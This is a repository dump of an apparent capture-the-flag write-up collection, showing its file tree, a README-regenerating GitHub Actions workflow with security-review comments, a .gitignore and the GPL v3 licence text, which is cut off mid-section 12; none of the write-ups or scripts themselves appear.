├── .github
└── workflows
│ └── update-readme.yml
├── .gitignore
├── LICENSE
├── README.md
├── README_top.md
├── contrib.py
├── generate_readme.sh
└── writeups
├── breakingbad
├── episodio 3
│ └── rmartinsanta
│ │ └── rmartinsanta.pdf
├── episodio1
│ ├── bicacaro
│ │ ├── BREAKING_BAD_EP1.pdf
│ │ └── web.py
│ └── masi
│ │ ├── login_brute_sqli.py
│ │ └── masi - UAM_BreakingBad_EP1.pdf
├── episodio2
│ ├── arsenics
│ │ └── Arsenics_Breaking bad episode 2.pdf
│ └── masi
│ │ └── masi - UAM_BreakingBad_EP2.pdf
└── episodio3
│ └── j0n3
│ └── Breaking Bad - Episodio 3.pdf
├── dragonball
├── episodio1
│ ├── M3n0s_D0n4ld
│ │ ├── M3n0s_D0n4ld-episodio1.pdf
│ │ └── a
│ ├── bicacaro
│ │ └── bicacaro-episodio1.pdf
│ ├── j0n3
│ │ └── j0n3-episodio1.pdf
│ ├── julianjm
│ │ └── julianjm-episodio1.md
│ └── nachinho3
│ │ └── nachinho3-episodio1.pdf
├── episodio2
│ └── j0n3
│ │ └── j0n3-episodio2.pdf
└── episodio3
│ ├── bicacaro
│ └── bicacaro-episodio3.pdf
│ ├── julianjm
│ ├── img
│ │ ├── uam_he_visto_cosas.jpg
│ │ ├── uam_init_array.png
│ │ ├── uam_malloc.png
│ │ ├── uam_vector_constructor.png
│ │ ├── uam_xd_cmp_eq.png
│ │ ├── uam_xd_run.png
│ │ └── uam_xd_xd.png
│ └── julianjm-episodio3.md
│ └── nachinho3
│ └── nachinho3-episodio3.pdf
├── extra
└── extra
│ ├── arsenics
│ └── arsenics-easymode.pdf
│ ├── darkeagle
│ └── darkeagle-easymode.pdf
│ └── j0n3
│ └── j0n3-easymode.pdf
├── futurama
└── episodio3-1
│ └── arsenics
│ └── futurama3.1-bof-Arsenics.pdf
├── lacasadepapel
├── episodio1-1
│ ├── alejandroparras
│ │ └── alejandroparras-episodio1-1.pdf
│ ├── bicacaro
│ │ └── bicacaro-episodio1-1.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio1-1.pdf
│ ├── j0n3
│ │ └── j0n3-episodio1-1.pdf
│ ├── nachinho3
│ │ └── nachinho3-episodio1-1.pdf
│ ├── oreos
│ │ └── oreos-episodio1-1.txt
│ ├── percu
│ │ └── percu-episodio1-1.pdf
│ ├── rafamartos
│ │ └── rafamartos-episodio1-1.pdf
│ ├── selankon
│ │ └── selankon-episodio1-1.txt
│ ├── socialkas
│ │ └── socialkas-episodio1-1.pdf
│ └── victormanuelleyva
│ │ └── victormanuelleyva-episodio1-1.txt
├── episodio1-2
│ ├── bicacaro
│ │ └── bicacaro-episodio1-2.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio1-2.pdf
│ ├── j0n3
│ │ └── j0n3-episodio1-2.pdf
│ ├── oreos
│ │ └── oreos-episodio1-2.txt
│ └── rafamartos
│ │ └── rafamartos-episodio1-2.pdf
├── episodio2
│ ├── cesarjz
│ │ └── cesarjz-episodio2.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio2.pdf
│ ├── j0n3
│ │ └── j0n3-episodio2.pdf
│ ├── percu
│ │ └── percu-episodio2.pdf
│ ├── rafamartos
│ │ └── rafamartos-episodio2.pdf
│ └── victormanuelleyva
│ │ └── victormanuelleyva-episodio2.txt
└── episodio3
│ ├── bicacaro
│ └── bicacaro-episodio3.pdf
│ ├── blueudp
│ └── blueudp-episodio3.py
│ ├── cesarjz
│ └── cesarjz-episodio3.pdf
│ ├── darkeagle
│ └── darkeagle-episodio3.pdf
│ ├── j0n3
│ └── j0n3-episodio3.pdf
│ └── victormanuelleyva
│ └── victormanuelleyva-episodio3.txt
├── matrix
├── episodio1
│ ├── bicacaro
│ │ └── bicacaro-episodio1.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio1.pdf
│ ├── julianjm
│ │ └── julianjm-episodio1.pdf
│ └── nachinho3
│ │ └── nachinho3-episodio1.pdf
├── episodio2
│ ├── darkeagle
│ │ └── darkeagle-episodio2.pdf
│ ├── julianjm
│ │ └── julianjm-episodio2.md
│ └── nachinho3
│ │ └── nachinho3-episodio2.pdf
└── episodio3
│ ├── arsenics
│ └── arsenics-episodio3.pdf
│ ├── darkeagle
│ └── darkeagle-episodio3.pdf
│ └── j0n3
│ └── j0n3-episodio3.pdf
├── missions
├── mission02
│ ├── 1v4n
│ │ └── 1v4n-mission02.txt
│ └── nachinho3
│ │ └── nachinho3-mission02.pdf
├── mission03
│ └── nachinho3
│ │ └── nachinho3-mission03.pdf
├── mission04
│ └── j0n3
│ │ └── j0n3-mission04.pdf
├── mission05
│ ├── j0n3
│ │ └── j0n3-mission05.pdf
│ ├── nachinho3
│ │ └── nachinho3-mission05.pdf
│ ├── percu
│ │ └── percu-mission05.pdf
│ └── rafamartos
│ │ └── rafamartos-mission05.pdf
└── mission06
│ ├── 1v4n
│ └── 1v4n-mission06.txt
│ ├── nachinho3
│ └── nachinho3-mission06.pdf
│ └── rafamartos
│ └── rafamartos-mission06.pdf
├── siliconvalley
├── episodio1
│ ├── 1v4n
│ │ └── 1v4n-episodio1.pdf
│ ├── arsenics
│ │ └── arsenics-episodio1.pdf
│ ├── bicacaro
│ │ └── bicacaro-episodio1.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio1.pdf
│ ├── j0n3
│ │ └── j0n3-episodio1.pdf
│ ├── nachinho3
│ │ └── nachinho3-episodio1.pdf
│ ├── percu
│ │ └── percu-episodio1.pdf
│ ├── rafamartos
│ │ └── rafamartos-episodio1.pdf
│ ├── ramonsola
│ │ └── ramonsola-episodio1.pdf
│ ├── rubenansotegui
│ │ └── rubenansotegui-episodio1.txt
│ └── tonicastillo
│ │ └── tonicastillo-episodio1.pdf
├── episodio2
│ ├── 1v4n
│ │ └── 1v4n-episodio2.pdf
│ ├── arsenics
│ │ └── arsenics-episodio2.pdf
│ ├── bicacaro
│ │ └── bicacaro-episodio2.pdf
│ ├── darkeagle
│ │ └── darkeagle-episodio2.pdf
│ ├── j0n3
│ │ └── j0n3-episodio2.pdf
│ ├── nachinho3
│ │ └── nachinho3-episodio2.pdf
│ └── rafamartos
│ │ └── rafamartos-episodio2.pdf
└── episodio3
│ ├── 1v4n
│ └── 1v4n-episodio3.pdf
│ ├── bicacaro
│ └── bicacaro-episodio3.pdf
│ ├── darkeagle
│ └── darkeagle-episodio3.pdf
│ ├── j0n3
│ └── j0n3-episodio3.pdf
│ ├── nachinho3
│ └── nachinho3-episodio3.pdf
│ └── rafamartos
│ └── rafamartos-episodio3.pdf
└── universomarvel
├── episodio1-2
├── bicacaro
│ └── bicacaro-episodio1-2.pdf
├── darkeagle
│ └── DarkEagle-episodio1-2.pdf
├── j0n3
│ └── j0n3-episodio1-2.pdf
├── julianjm
│ └── julianjm-episodio1-2.pdf
├── masi
│ └── masi-episodio1-2.txt
├── nachinho3
│ └── nachinho3-episodio1-2.pdf
├── oreos
│ └── oreos-episodio1-2.txt
└── socialkas
│ └── socialkas-episodio1-2.pdf
├── episodio1
├── 1v4n
│ └── 1v4n-episodio1.pdf
├── arsenics
│ └── arsenics-episodio1.pdf
├── bicacaro
│ └── bicacaro-episodio1.pdf
├── darkeagle
│ └── DarkEagle-episodio1.pdf
├── j0n3
│ └── j0n3-episodio1.pdf
├── julianjm
│ └── julianjm-episodio1.txt
├── masi
│ └── masi-episodio1.txt
├── nachinho3
│ └── nachinho3-episodio1.pdf
├── oreos
│ └── oreos-episodio1.docx
├── rafamartos
│ └── rafamartos-episodio1.pdf
└── victormanuelleyva
│ └── victormanuelleyva-episodio1.txt
├── episodio2
├── arsenics
│ └── arsenics-episodio2.pdf
├── asterixco
│ └── asterixco-episodio2.pdf
├── bicacaro
│ └── bicacaro-episodio2.pdf
├── darkeagle
│ └── darkeagle-episodio2.pdf
└── julianjm
│ └── julianjm-episodio2.pdf
└── episodio3
├── arsenics
└── arsenics-episodio3.pdf
├── bechma
└── bechma-episdio3.pdf
├── bicacaro
└── bicacaro-episodio3.pdf
├── darkeagle
├── coordenades.txt
├── darkeagle-episodio3.pdf
└── solve_final.py
└── julianjm
└── julianjm-episodio3.pdf
/.github/workflows/update-readme.yml:
--------------------------------------------------------------------------------
# Regenerates README.md on every push to master and commits the result back
# to master using the workflow's GITHUB_TOKEN.
name: Update readme and contributors
on:
  push:
    branches:
      - 'master'

jobs:
  generate-readme:
    # Guard so forks of the repository do not run the auto-commit job.
    if: github.repository == 'devploit/unaalmes-writeups'
    name: Generate README.md
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Repository
        # NOTE(review): pinned by major-version tag, so the action code behind
        # "v2" can change without any change here; pinning to a full commit SHA
        # (with the tag in a trailing comment) makes the dependency immutable.
        # The same applies to setup-python and the commit action below.
        uses: actions/checkout@v2
      - name: Setup python3
        uses: actions/setup-python@v1
        with:
          python-version: '3.x'
          architecture: 'x64'
      - name: Update README
        # Runs the repository's own script on the checked-out tree; anyone who
        # can push to master therefore controls what executes in this step.
        run: bash generate_readme.sh
      - name: Create commit and push
        # Third-party action that receives the repo-scoped token and pushes
        # directly to master -- the highest-trust step of this workflow.
        uses: github-actions-x/commit@v2.6
        with:
          # NOTE(review): the token carries whatever default permissions the
          # repository grants workflows; a top-level `permissions:` block
          # limited to `contents: write` would confine it to the push below.
          github-token: ${{ secrets.GITHUB_TOKEN }}
          push-branch: master
          commit-message: 'Update README.md'
          # Only README.md is staged, so other generated output is not committed.
          files: README.md
          # Quoted on purpose: the action presumably reads this as a string -- confirm
          # before changing it to a YAML boolean.
          rebase: 'true'
          name: 'GH Action Bot'
          email: unaalmes@hispasec.com
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .idea/
2 | .DS_Store
3 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
